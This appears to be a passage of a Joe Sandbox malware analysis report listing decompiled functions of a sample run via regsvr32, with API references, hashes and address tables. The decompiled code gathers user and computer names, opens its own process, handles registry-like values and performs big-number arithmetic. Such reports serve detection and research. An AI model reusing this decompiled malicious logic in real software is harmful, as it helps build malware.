								_t35 = _t68 + 0x2bdea3f; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x2bde8e7; // 0x55434b48
								_t69 = _t34;
							}
							if(E02BD8F85(_t69,  *0x2bdd334,  *0x2bdd338,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x2bdd2a8; // 0x242a5a8
									_t44 = _t71 + 0x2bde846; // 0x74666f53
									_t73 = E02BD7B3B(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d02bdc0
										E02BD4538( *_t47, _t91, _a8,  *0x2bdd338, _a24);
										_t49 = _t101 + 0x10; // 0x3d02bdc0
										E02BD4538( *_t49, _t91, _t99,  *0x2bdd330, _a16);
										E02BD8B22(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d02bdc0
									E02BD4538( *_t40, _t91, _a8,  *0x2bdd338, _a24);
									_t43 = _t101 + 0x10; // 0x3d02bdc0
									E02BD4538( *_t43, _t91, _a8,  *0x2bdd330, _a16);
								}
								if( *_t101 != 0) {
									E02BD8B22(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d02bdc0
					_t81 = E02BD7DDD( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d02bdc0
							E02BDA38F(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E02BD8B22(_t100);
						_t98 = _a16;
					}
					E02BD8B22(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E02BDA789(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x2bdd33c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}























                                0x02bd4b2a
                                0x02bd4b33
                                0x02bd4b3a
                                0x02bd4b3f
                                0x02bd4bac
                                0x02bd4bb2
                                0x02bd4bb7
                                0x02bd4bbe
                                0x02bd4bc3
                                0x02bd4bc8
                                0x02bd4d33
                                0x02bd4d3a
                                0x02bd4d3a
                                0x02bd4d3f
                                0x02bd4d41
                                0x02bd4d41
                                0x02bd4d4a
                                0x02bd4d4a
                                0x02bd4bce
                                0x02bd4bda
                                0x02bd4d29
                                0x02bd4d2c
                                0x00000000
                                0x02bd4d2c
                                0x02bd4be0
                                0x02bd4be5
                                0x02bd4be8
                                0x02bd4bed
                                0x02bd4bf2
                                0x02bd4c3b
                                0x02bd4c3b
                                0x02bd4c4e
                                0x02bd4c58
                                0x02bd4c5e
                                0x02bd4c65
                                0x02bd4c6f
                                0x02bd4c6f
                                0x02bd4c67
                                0x02bd4c67
                                0x02bd4c67
                                0x02bd4c67
                                0x02bd4c91
                                0x02bd4c99
                                0x02bd4cc7
                                0x02bd4ccc
                                0x02bd4cd3
                                0x02bd4cd8
                                0x02bd4cdc
                                0x02bd4d0e
                                0x02bd4cde
                                0x02bd4ceb
                                0x02bd4cee
                                0x02bd4cfe
                                0x02bd4d01
                                0x02bd4d07
                                0x02bd4d07
                                0x02bd4c9b
                                0x02bd4ca8
                                0x02bd4cab
                                0x02bd4cbd
                                0x02bd4cc0
                                0x02bd4cc0
                                0x02bd4d18
                                0x02bd4d24
                                0x02bd4d1a
                                0x02bd4d1d
                                0x02bd4d1d
                                0x02bd4d18
                                0x02bd4c91
                                0x00000000
                                0x02bd4c58
                                0x02bd4c01
                                0x02bd4c04
                                0x02bd4c0b
                                0x02bd4c11
                                0x02bd4c14
                                0x02bd4c16
                                0x02bd4c22
                                0x02bd4c25
                                0x02bd4c25
                                0x02bd4c2b
                                0x02bd4c30
                                0x02bd4c30
                                0x02bd4c36
                                0x00000000
                                0x02bd4c36
                                0x02bd4b44
                                0x00000000
                                0x02bd4b6b
                                0x02bd4b6b
                                0x02bd4b77
                                0x02bd4b8a
                                0x02bd4b90
                                0x02bd4b98
                                0x00000000
                                0x02bd4b98

                                APIs
                                • StrChrA.SHLWAPI(02BD9900,0000005F,00000000,00000000,00000104), ref: 02BD4B5D
                                • lstrcpy.KERNEL32(?,?), ref: 02BD4B8A
                                  • Part of subcall function 02BD7B3B: lstrlen.KERNEL32(?,00000000,05009D18,00000000,02BD5142,05009F3B,?,?,?,?,?,69B25F44,00000005,02BDD00C), ref: 02BD7B42
                                  • Part of subcall function 02BD7B3B: mbstowcs.NTDLL ref: 02BD7B6B
                                  • Part of subcall function 02BD7B3B: memset.NTDLL ref: 02BD7B7D
                                  • Part of subcall function 02BD4538: lstrlenW.KERNEL32(?,?,?,02BD4CF3,3D02BDC0,80000002,02BD9900,02BD5C8D,74666F53,4D4C4B48,02BD5C8D,?,3D02BDC0,80000002,02BD9900,?), ref: 02BD455D
                                  • Part of subcall function 02BD8B22: RtlFreeHeap.NTDLL(00000000,00000000,02BD131A,00000000,?,?,00000000), ref: 02BD8B2E
                                • lstrcpy.KERNEL32(?,00000000), ref: 02BD4BAC
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                • String ID: ($\
                                • API String ID: 3924217599-1512714803
                                • Opcode ID: 2981e9fca3b65644ba144a94ebad2bc5536a25cde3e272beb781589c0269093d
                                • Instruction ID: 2910885585b9e52012b4b604764df175029249f1bf69deba6f4d9e4ade48ea7b
                                • Opcode Fuzzy Hash: 2981e9fca3b65644ba144a94ebad2bc5536a25cde3e272beb781589c0269093d
                                • Instruction Fuzzy Hash: D451497250060ABFDF21AFA0DD84EEA7BBAEB04355F008994F95597160F732D926DF20
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02BD9FF6, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28sleepmemoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 37%
                                			E02BD9FF6() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x2bdd32c; // 0x50095b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x2bdd32c; // 0x50095b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x2bdd32c; // 0x50095b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x2bde81a) {
					HeapFree( *0x2bdd238, 0, _t10);
					_t7 =  *0x2bdd32c; // 0x50095b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                                0x02bd9ff6
                                0x02bd9fff
                                0x02bda00f
                                0x02bda00f
                                0x02bda014
                                0x02bda019
                                0x00000000
                                0x00000000
                                0x02bda009
                                0x02bda009
                                0x02bda01b
                                0x02bda020
                                0x02bda024
                                0x02bda037
                                0x02bda03d
                                0x02bda03d
                                0x02bda046
                                0x02bda048
                                0x02bda04c
                                0x02bda052

                                APIs
                                • RtlEnterCriticalSection.NTDLL(05009570), ref: 02BD9FFF
                                • Sleep.KERNEL32(0000000A,?,02BD30F3), ref: 02BDA009
                                • HeapFree.KERNEL32(00000000,?,?,02BD30F3), ref: 02BDA037
                                • RtlLeaveCriticalSection.NTDLL(05009570), ref: 02BDA04C
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                • String ID: Ut
                                • API String ID: 58946197-8415677
                                • Opcode ID: 4940f60a274c4e3b2808ac967f0d7875410168b6eb6e5aa82b9b0eee82a94b52
                                • Instruction ID: 899f999bf242c0aa0633f3b1f28c6afddcb11b65c2c5d3e07c122dc3b59d75ab
                                • Opcode Fuzzy Hash: 4940f60a274c4e3b2808ac967f0d7875410168b6eb6e5aa82b9b0eee82a94b52
                                • Instruction Fuzzy Hash: B1F0F875E821029FE7189F68D869FA57BE4EB0C394B848899F942DB350F734EC20CE15
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02BD9267, Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E02BD9267() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t64 = E02BD1525(_v12 + _t43 + 2 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E02BD8B22(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x2bd9cb2
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}















                                0x02bd9275
                                0x02bd9278
                                0x02bd927b
                                0x02bd9281
                                0x02bd9286
                                0x02bd928c
                                0x02bd9294
                                0x02bd9297
                                0x02bd929d
                                0x02bd92a2
                                0x02bd92af
                                0x02bd92bc
                                0x02bd92c0
                                0x02bd92c2
                                0x02bd92c6
                                0x02bd92c9
                                0x02bd92d9
                                0x02bd932c
                                0x02bd932d
                                0x02bd92db
                                0x02bd92e0
                                0x02bd92e1
                                0x02bd92e6
                                0x02bd92e9
                                0x02bd92fc
                                0x00000000
                                0x02bd92fe
                                0x02bd9301
                                0x02bd9306
                                0x02bd9314
                                0x02bd9317
                                0x02bd931d
                                0x02bd9322
                                0x00000000
                                0x02bd9324
                                0x02bd9324
                                0x02bd9327
                                0x02bd9327
                                0x02bd9322
                                0x02bd92fc
                                0x02bd9332
                                0x02bd9333
                                0x02bd92a2
                                0x02bd9339

                                APIs
                                • GetUserNameW.ADVAPI32(00000000,02BD9CB0), ref: 02BD927B
                                • GetComputerNameW.KERNEL32(00000000,02BD9CB0), ref: 02BD9297
                                  • Part of subcall function 02BD1525: RtlAllocateHeap.NTDLL(00000000,00000000,02BD1278), ref: 02BD1531
                                • GetUserNameW.ADVAPI32(00000000,02BD9CB0), ref: 02BD92D1
                                • GetComputerNameW.KERNEL32(02BD9CB0,?), ref: 02BD92F4
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,02BD9CB0,00000000,02BD9CB2,00000000,00000000,?,?,02BD9CB0), ref: 02BD9317
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                • String ID:
                                • API String ID: 3850880919-0
                                • Opcode ID: 7715f187d52312790cf8256231d6b5ef497e4d531346ae7f5ee014b3d860516e
                                • Instruction ID: de7f505d66335dd23a0b4da7751ca1e341a7234549aed68e62e052f773a54f15
                                • Opcode Fuzzy Hash: 7715f187d52312790cf8256231d6b5ef497e4d531346ae7f5ee014b3d860516e
                                • Instruction Fuzzy Hash: 4821D5B6D01608FFCB11DFE8D9849EEBBBDEF44244B9084AAE502E7241E7309B45DB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02BD9EBB, Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E02BD9EBB(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x2bdd26c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x2bdd25c = _t4;
					_t6 = GetCurrentProcessId();
					 *0x2bdd258 = _t6;
					 *0x2bdd264 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x2bdd254 = _t7;
					if(_t7 == 0) {
						 *0x2bdd254 =  *0x2bdd254 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}









                                0x02bd9ec3
                                0x02bd9ec9
                                0x02bd9ed0
                                0x00000000
                                0x02bd9f2a
                                0x02bd9ed2
                                0x02bd9eda
                                0x02bd9ee7
                                0x02bd9ee7
                                0x02bd9f27
                                0x00000000
                                0x02bd9f27
                                0x02bd9ee9
                                0x02bd9ee9
                                0x02bd9eee
                                0x02bd9f00
                                0x02bd9f05
                                0x02bd9f0b
                                0x02bd9f11
                                0x02bd9f18
                                0x02bd9f1a
                                0x02bd9f1a
                                0x00000000
                                0x02bd9f21
                                0x02bd9ee3
                                0x00000000
                                0x00000000
                                0x02bd9ee5
                                0x00000000

                                APIs
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,02BD27C3,?,?,00000001,?,?,?,02BD7F25,?), ref: 02BD9EC3
                                • GetVersion.KERNEL32(?,00000001,?,?,?,02BD7F25,?), ref: 02BD9ED2
                                • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,02BD7F25,?), ref: 02BD9EEE
                                • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,02BD7F25,?), ref: 02BD9F0B
                                • GetLastError.KERNEL32(?,00000001,?,?,?,02BD7F25,?), ref: 02BD9F2A
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                • String ID:
                                • API String ID: 2270775618-0
                                • Opcode ID: 3d7d7f595089041fd5cc2c7926fb8b6d9dac86a19bfc973a63b98c159685f26e
                                • Instruction ID: 5cda6db62a99a53c93e65107051aea0e565a5dcf2ebcb431f163cbac5d81abdf
                                • Opcode Fuzzy Hash: 3d7d7f595089041fd5cc2c7926fb8b6d9dac86a19bfc973a63b98c159685f26e
                                • Instruction Fuzzy Hash: DDF08771ED6B03ABD7208B64E929BE53FA2E740785F40491AE5C2C71C0F770E021CB19
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02BD4E05, Relevance: 6.2, APIs: 4, Instructions: 154memorystringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 46%
                                			E02BD4E05(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x2bdd2a8; // 0x242a5a8
					_t5 = _t103 + 0x2bde038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x2bdc290);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x2bdd2a8; // 0x242a5a8
												_t28 = _t109 + 0x2bde0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x2bdd2a8; // 0x242a5a8
														_t33 = _t79 + 0x2bde078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}





































                                0x02bd4e0a
                                0x02bd4e13
                                0x02bd4e14
                                0x02bd4e18
                                0x02bd4e1e
                                0x02bd4e24
                                0x02bd4e2d
                                0x02bd4e33
                                0x02bd4e3d
                                0x02bd4e3f
                                0x02bd4e45
                                0x02bd4e4a
                                0x02bd4e55
                                0x02bd4e5b
                                0x02bd4e60
                                0x02bd4f82
                                0x02bd4e66
                                0x02bd4e66
                                0x02bd4e73
                                0x02bd4e79
                                0x02bd4e7f
                                0x02bd4e83
                                0x02bd4e89
                                0x02bd4e96
                                0x02bd4e9a
                                0x02bd4ea0
                                0x02bd4ea3
                                0x02bd4eab
                                0x02bd4eac
                                0x02bd4eb0
                                0x02bd4eb4
                                0x02bd4eb7
                                0x02bd4eba
                                0x02bd4ec0
                                0x02bd4ec9
                                0x02bd4ecf
                                0x02bd4ed0
                                0x02bd4ed3
                                0x02bd4ed4
                                0x02bd4ed5
                                0x02bd4edd
                                0x02bd4ede
                                0x02bd4edf
                                0x02bd4ee1
                                0x02bd4ee5
                                0x02bd4ee9
                                0x00000000
                                0x00000000
                                0x02bd4eef
                                0x02bd4ef8
                                0x02bd4efe
                                0x02bd4f08
                                0x02bd4f0c
                                0x02bd4f0e
                                0x02bd4f1b
                                0x02bd4f1f
                                0x02bd4f27
                                0x02bd4f2c
                                0x02bd4f3e
                                0x02bd4f40
                                0x02bd4f46
                                0x02bd4f46
                                0x02bd4f4f
                                0x02bd4f4f
                                0x02bd4f51
                                0x02bd4f57
                                0x02bd4f57
                                0x02bd4f5a
                                0x02bd4f60
                                0x02bd4f63
                                0x02bd4f6c
                                0x00000000
                                0x00000000
                                0x00000000
                                0x02bd4f6c
                                0x02bd4ec0
                                0x02bd4eba
                                0x02bd4ea3
                                0x02bd4f72
                                0x02bd4f72
                                0x02bd4f78
                                0x02bd4f78
                                0x02bd4f7e
                                0x02bd4f7e
                                0x02bd4f87
                                0x02bd4f8d
                                0x02bd4f8d
                                0x02bd4e4a
                                0x02bd4f96

                                APIs
                                • SysAllocString.OLEAUT32(02BDC290), ref: 02BD4E55
                                • lstrcmpW.KERNEL32(00000000,0076006F), ref: 02BD4F36
                                • SysFreeString.OLEAUT32(00000000), ref: 02BD4F4F
                                • SysFreeString.OLEAUT32(?), ref: 02BD4F7E
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: String$Free$Alloclstrcmp
                                • String ID:
                                • API String ID: 1885612795-0
                                • Opcode ID: 4f1054490bdfebadf94121581230cc54e5769801f50b67327fa76f0c02ade7bb
                                • Instruction ID: 136954fe1f08753307030573886623a336b8637d075099e0d71f17c120806c39
                                • Opcode Fuzzy Hash: 4f1054490bdfebadf94121581230cc54e5769801f50b67327fa76f0c02ade7bb
                                • Instruction Fuzzy Hash: CF512F75D00519EFCB00DFA8C4889EEF7BAFF89705B154595E919EB220E731AD41CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02BD137B, Relevance: 6.2, APIs: 4, Instructions: 154memoryCOMMON
                                Download Yara Rule
                                APIs
                                • SysAllocString.OLEAUT32(?), ref: 02BD13B6
                                • SysFreeString.OLEAUT32(00000000), ref: 02BD149B
                                  • Part of subcall function 02BD4E05: SysAllocString.OLEAUT32(02BDC290), ref: 02BD4E55
                                • SafeArrayDestroy.OLEAUT32(00000000), ref: 02BD14EE
                                • SysFreeString.OLEAUT32(00000000), ref: 02BD14FD
                                  • Part of subcall function 02BD52B9: Sleep.KERNEL32(000001F4), ref: 02BD5301
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: String$AllocFree$ArrayDestroySafeSleep
                                • String ID:
                                • API String ID: 3193056040-0
                                • Opcode ID: b5d0581617fa0a040cc0bf8c2016281146b01c6ae05add121f51b71ceb0af6f2
                                • Instruction ID: f3f71a735c5edf1517c00f3936a24790d15303ea40b5cff4e53307fdfff18fca
                                • Opcode Fuzzy Hash: b5d0581617fa0a040cc0bf8c2016281146b01c6ae05add121f51b71ceb0af6f2
                                • Instruction Fuzzy Hash: 3D515136900609AFDB11CFA8C844BDEB7B6FF88744B198869E909DB210EB71ED05CF50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02BD29ED, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                Download Yara Rule
                                C-Code - Quality: 85%
                                			E02BD29ED(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E02BD8B37(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E02BD4AA4(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E02BD2F01(_t101,  &_v236, _a8, _t96 - _t81);
					E02BD2F01(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E02BD4AA4(_t101, 0x2bdd1b0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E02BD4AA4(_a16, _a4);
						E02BD28BA(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L02BDAF6E();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L02BDAF68();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E02BD9947(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E02BD4506(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E02BDA708(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x2bdd1b0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                                0x02bd29f0
                                0x02bd29fc
                                0x02bd2a02
                                0x02bd2a07
                                0x02bd2a0b
                                0x02bd2b68
                                0x02bd2b6c
                                0x02bd2b6c
                                0x02bd2a11
                                0x02bd2a15
                                0x02bd2a19
                                0x02bd2a1c
                                0x02bd2a27
                                0x02bd2a2d
                                0x02bd2a32
                                0x02bd2a35
                                0x02bd2a4f
                                0x02bd2a5b
                                0x02bd2a64
                                0x02bd2a6e
                                0x02bd2a73
                                0x02bd2a75
                                0x02bd2a78
                                0x02bd2b26
                                0x02bd2b2c
                                0x02bd2b3d
                                0x02bd2b50
                                0x02bd2b60
